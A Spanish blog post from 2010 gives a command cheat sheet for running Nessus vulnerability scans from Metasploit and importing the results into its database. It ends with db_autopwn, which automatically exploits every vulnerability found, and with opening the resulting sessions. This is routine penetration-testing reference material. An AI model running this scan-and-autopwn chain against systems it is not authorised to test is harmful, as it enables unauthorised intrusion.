25 Oct 2010

Nessus y Metasploit (III)

Siguiente asalto: vamos a ver como usar Nessus desde Metasploit. Esto va a ser simplemente una ristra de comandos con la idea de tener un recordatorio siempre a mano, por lo que hay que comprender que hay cosas que simplemente figuran por su probable utilización, no es que sea un paso-a-paso exacto a seguir. Aclarado esto vamos a por ellos:
/opt/nessus/sbin/nessusd
cd /pentest/exploits/framework3
./msfconsole
load nessus
nessus_help
nessus_connect username:passwd@127.0.0.1:8834 ok
nessus_server_status
nessus_admin   (debemos tener un usuario admin)
nessus_plugin_list
nessus_policy_list
Anotar el [id] y [nombre] del que pensemos usar. Si no está creada habrá que entrar por el frontal web de Nessus en 127.0.0.1:8834 y crearla. Ahora ya lanzamos el escaneo:
nessus_scan_new [id] [nombre] [ip]     ([id] y [nombre] anteriores y la [ip] objetivo)
Para ver el progreso del escaneo:
nessus_scan_status
nessus_report_list   (atentos a copiar el [ID] en el que estemos interesados)
nessus_report_hosts [ID]
nessus_report_host_ports [ip] [ID]
nessus_report_host_detail [ip] [puerto] [protocolo] [ID]

Bueno, seguramente veremos cosas muy interesantes en los resultados y queremos lanzar el autopwn. Para cargar los resultados en la base de datos la arrancamos como hemos visto en el post anterior, si no está ya arrancada, ejecutando en una terminal:
/etc/init.d/postgresql-8.3 start   (si hemos seguido el post anterior no debe dar problemas)
Y de vuelta en Metasploit:
db_driver postgresql
db_connect postgres:[contraseña]@127.0.0.1/dbmetasploit
nessus_report_get [ID]
db_services
db_hosts -c address,vulns
db_autopwn -x -e
sessions -l
sessions -i [id_de_sesion]

---

No comments: